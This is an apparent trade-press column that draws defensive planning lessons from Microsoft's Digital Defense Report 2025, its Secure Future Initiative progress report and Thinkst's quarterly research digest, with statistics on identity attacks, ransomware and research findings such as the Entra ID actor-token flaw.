Refining Your Cybersecurity Strategy Based on Data

• By Paul Schnackenburg
• 12/03/2025

Learning about cybersecurity risks and mitigations is an endless rabbit hole. Along the way, many companies publish reports, filled with statistics and findings, guiding you towards a particular view of the preferred solution, often the ones the company happens to be selling.

But the lack of reliable ground truth for cybersecurity risks is a challenge for anyone attempting to figure out where to put their limited budget (or in my case, attempt to convince my clients to shell out for various services). And often, vendors do have large, useful datasets, but the data needs to be understood in context. If you're an email security vendor, your logs will be skewed towards email attacks, and thus your "view of the world" will be biased. Another example is "the average cost of a data breach" being reported by IBM as $4.4 million USD for 2025, $4.88 million USD for 2024 and so forth. Really? Maybe for the 1-2% of businesses classified as enterprises, but for every one of my clients, and 98% of businesses worldwide with less than 1,000 staff, that kind of cost would be completely business ending, and it's mostly not, so I suspect the average for SMBs is a lot less.

In this article I'll look at Microsoft's recently released annual Digital Defense Report (DDR) 2025, their quarterly Secure Future Initiative (SFI) progress report from November, Thinkst's ThinkstScapes for Q3 and weave in a few other data points along the way. I'll also extract the salient points that you can apply to your own organization's cybersecurity approach. Microsoft's report is unique in that they cover every area in their services and security products and ingest data from both the commercial world (Azure, Microsoft 365, Dynamics 365 etc.) and the consumer risk landscape (Xbox, Bing etc.).

100 Trillion Signals a Day
The DDR is the evolution of the older annual Security Intelligence Report (SIR) so Microsoft has been at this for quite a few years. With contributions from 23 teams and 200 people over the last 12 months, the DDR is nevertheless quite easy to digest at 78 pages (plus a very handy glossary at the end). It's divided into two main sections, the first outlining the threat landscape, and the second the defense landscape.

And yes, Microsoft is claiming 100 trillion security signals processed daily, 4.5 million net new malware files blocked every day, and 5 billion emails screened daily. These are just nebulous numbers that are impossible for me to wrap my head around, but very few other organizations have such a comprehensive view of the cyber risk landscape on the internet (maybe AWS, Google and Cloudflare come to mind, but they don't offer services across every area).

The U.S. is the "leader" for Microsoft's customers being targeted at 24.8%, with the U.K. in second place at 5.6%, and Australia sharing 10th place with Taiwan at 1.8%. As for the industry vertical most in the crosshairs, that's Government agencies & services (17%), IT (also 17%) and Research and academia (11%).

The motivation of the attackers, based on reporting from Microsoft's Incident Response team, is interesting:

Note that ransomware is only 1/5th, with data theft and extortion much more likely. Again, read these statistics based on the source, in this case Microsoft's Incident Response team, which only large organizations will be able to afford when they have a breach. Espionage at only 4% makes sense, again you need to adapt this kind of figure against your organization's vertical. If you're a defense contractor that figure will be much higher, if you're in retail, it's close to 0%. I found infrastructure building intriguing, it's where the attackers take advantage of unmanaged assets to stage attacks against other third-party targets. This saves attackers on the cloud bill for running the attack in the first place and also muddles attribution attempts (and is also why the idea of "hacking back" can be so dangerous -- making sure you're actually attacking the bad guy, and not another victim's infrastructure, isn't straightforward).

The initial access vector can be exploiting a public-facing application (11%), valid accounts (11%) or social engineering (10%, up from 8% in 2024). Where AI-automated phishing emails are used they're achieving a 54% click-through rate (compared to 12% for standard) attempts, but they're equally likely to get blocked by the email hygiene solution.

Another observation that Microsoft isn't alone in making is the rapid weaponization of exploits, where the time window between vulnerability disclosure, patch availability and patch deployment used to be measured in weeks and can now be days or even hours. Having the processes in place to triage high impact vulnerabilities, identify affected systems and rapidly roll out patches is challenging, but necessary.

One type of initial access that's risen in popularity over the last year is ClickFix where an attacker plants a "fake captcha" and lures victims to the page (often with SEO poisoning -- buying ad space for related search terms, in essence relying on Google search being the vector to distribute the attack), where they're asked to click Win + R to open the Run dialog box and hit enter on Windows to prove they're human, which runs the attacker's code. You should definitely include awareness of this attack type in your regular user training.

Overall, the saying that "attackers don't break in, they log in" is true, but they still break in as well, so you've got to protect against both. The rise of infostealers is also called out, which is malware that runs on a user's (personal?) devices and scrapes usernames and passwords, along with cryptocurrency secrets. The most popular infostealer was Lumma Stealer (51%), which was taken down by Microsoft and others in May 2025.

As for emerging threats it's no surprise that attackers will use AI-enhanced social engineering and attacks but the biggest takeaway for me is the expansion of supply chain compromises. Getting access to dozens of clients by compromising a single Managed Service Provider, or thousands of endpoints by subverting a single application package is a fruitful path for attackers to take. If one of your suppliers were compromised -- could you detect the subsequent infiltration into your systems? What's your business risk management plan for it?

Cloud identities are targeted, including through malicious OAuth apps, highlighting the need for app governance. Putting the spotlight on identity attacks (and where you should focus your limited budget) is the fact that more than 97% of them are password spray or brute force attacks. That small leftover slice of 3% is made up of:

In other words, attackers are bypassing MFA 10 times as frequently by stealing the token from users via malware on their devices (personal BYOD devices if you allow them) than they are through setting up fake login pages and tricking users into handing over their credentials. You should still move to phishing-resistant authentication (as that journey will take years), particularly now that Entra ID supports synced passkeys through any password manager, not just Microsoft Authenticator.

In the first half of 2025, identity-based attacks rose by 32% which is a sobering statistic, reinforcing the need to build your cybersecurity strategy on strong identity authentication. This is particularly true if you're in research and academia which are overrepresented in the data:

The specialization in the cyber crime ecosystem is highlighted by the importance of access brokers, who provide that initial compromise, but then sell that to other criminals who perform the actual attacks.

Another fascinating statistic is that out of the 50,000 Autonomous System Numbers (ASNs) that carry authentication traffic, only 20 (0.04%) are the source of 80% of password spray activity. They'd be a good indicator that you could block.

Coming back to business size, the number of organizations in different revenue brackets that were hit by ransomware is fascinating, with smaller ones much more numerous:

Attackers are getting more cloud savvy, today 40% of ransomware attacks involve hybrid, two years ago, less than 5% did. While EDR is highly effective in limiting these attacks, in over 82% of cases they also exfiltrate data to increase the pressure to pay on the victim. They also move faster than in the past, most attacks (59%) have a dwell time of seven days or less.

Business email compromise (BEC) is a more frequent outcome in attacks (21%) compared to ransomware (16%).

Rounding off the attack landscape is insider risk, something that most cybersecurity frameworks don't take into account. On average it takes 81 days to contain an insider incident. Don't forget about the North Korean IT worker risk, something that's spreading far beyond just large tech companies.

AI-Powered Defense?
On the opposite side, there are 10 key points in cyber defense mentioned:

1. Cyber risk is business risk
2. AI-powered defense is essential
3. AI agents can help in threat mitigation and incident response
4. Organizations should implement a security framework for AI use
5. Deterring cyberattacks requires political solutions
6. Cooperation across borders is crucial to mitigate cyber risks
7. Resilience must be woven in by design
8. Public-private collaboration is key to disrupting cybercrime ecosystems
9. Governments are moving away from voluntary compliance toward cyber requirements
10. Organizations must prepare for quantum computing

I couldn't agree more with No. 1, although we in the cybersecurity space must get better at quantifying that business risk. As for 2 and 3, this might be true, but it's suspect advice (given that Microsoft's big push is Security Copilot) and also unfeasible for smaller businesses (given that Security Copilot is too expensive for SMBs). There was a recent announcement at Ignite that Security Copilot Secure Compute Units (SCUs) will be included at a rate of number of M365 E5 licenses divided by 2.5, so a 1,000 user company will have 400 SCUs per month to work with, but an SMB with 15 users won't get much mileage out of six SCUs. Point 4 also makes sense, but it's hard to govern AI usage in a business because it moves so fast. Five and six are great ideas, but not something most businesses can influence much.

Cyber resilience and building culture are possibly one of the hardest nuts to crack, but arguably the most important. If your organization is big enough, collaboration with others, including the public sector, is important. And the fact that more government regulation is used to manage cyber risk isn't in doubt, given that relying "on the market" to handle the risk clearly isn't working. Upcoming quantum computing that'll break encryption is also something you need to take seriously.

Thinkstscapes
Thinkst makes a fantastic on-premises early warning system of intrusions in the form of honeypot appliances. They also offer free software based Canarytokens in over 30 flavors, well worth a quick setup to give you a strong signal that someone that shouldn't be there is in your infrastructure.

They also provide a free, quarterly report that sifts through security blog posts and talks to extract research that deserves attention. The latest report has sifted through 1,551 papers / talks to focus on 19 of them. One of them is "One Token to rule them all -- obtaining Global Admin in every Entra ID tenant via Actor tokens" where Dirk-jan Mollema, a well-known Entra ID researcher, found undocumented actor tokens used to synchronize hybrid Exchange / SharePoint environments to M365, which weren't properly validated. This attack made it possible for an adversary to create any account (including Global Admin) in any Entra ID tenant in the world. Fortunately, Dirk-jan is a good guy and he reported this to Microsoft responsibly and they fixed it.

Another research avenue (by a group of authors) is that modern, high precision optical mice can be used to capture audio spoken next to them, to steal passwords or PIN codes spoken aloud.

The final one I'll mention is the problem with internal Active Directory domain names where Top Level Domains (TLDs) that didn't exist decades ago, are now available. It started with "company.llc" which was registered in a red-team exercise, where they started capturing NTLM hashes that were sent over the internet to the red-team's server. Further, the ".ad" TLD was often used back in the day, but is the country of Andorra's TLD, including the domain "internal.ad", which the researcher also registered. The takeaway is if you're using an ".ad" domain internally in Active Directory, register that domain name so malicious actors can't use it against you.

Secure Future Initiative -- Covering It All?
Microsoft has now been at their Secure Future Initiative for two years, providing quarterly progress reports, and recommendations that other companies can adapt in securing their own infrastructure. The most recent report from November 2025 looks at their progress across six engineering pillars:

• Protecting identities and secrets
• Protect tenants and isolate production systems
• Protect networks
• Protect engineering systems
• Monitor and detect threats
• Accelerate response and remediation

Highlights that affect us as users of Microsoft's services are the expansion of Azure mandatory MFA to Azure Bastion (a way to connect to VMs in the cloud securely), and the introduction of MFA for command-line interfaces (PowerShell and CLI). Microsoft Purview manages and monitors AI data security across Copilots, agents and apps (including third-party LLMs).

Internally Microsoft has 99.6% (!) adoption rate for phishing-resistant MFA across their user base, and 44,500 higher risk users use Azure Virtual Desktops to reduce device compromise risk. They've also deployed over 50 new detections in their own infrastructure and generally applicable ones will be implemented in Microsoft Defender as well. And they've retired Active Directory Federation Services (ADFS) usage internally, which to me signals for any enterprise still using ADFS -- it's time to let it go.

If you need on-premises virtualization infrastructure (perhaps to replace those VMware clusters that are sucking up all your IT budget in licensing fee increases), Azure Local (formerly Azure Stack HCI) has adopted another 400 default security settings. If you've got infrastructure in Azure public cloud, every new server in Azure is fitted with a Hardware Security Module that's FIPS 140-3 level 3 compliant, providing hardware enforced trust for Azure Storage and Azure Key Vault.

The report is overall positive about their progress, and it's very impressive given the size and complexity of Microsoft, but I do have to ask, given the mantra is "Security above all else", why no one in the M365 engineering team put up their hand and said "these Actor tokens that we rely on in hybrid infrastructure -- could they be used maliciously?" before Dirk-jan found them as an external researcher? Maybe someone did but it wasn't taken seriously? Seems like there are still "bodies buried" in places that Microsoft hasn't found yet.

Conclusion
Building your cybersecurity strategy on actionable data is crucial and keeping up with the changing threat landscape is hard. With thousands of cybersecurity reports being released every month, hopefully the salient points from these three important ones will help you in this quest.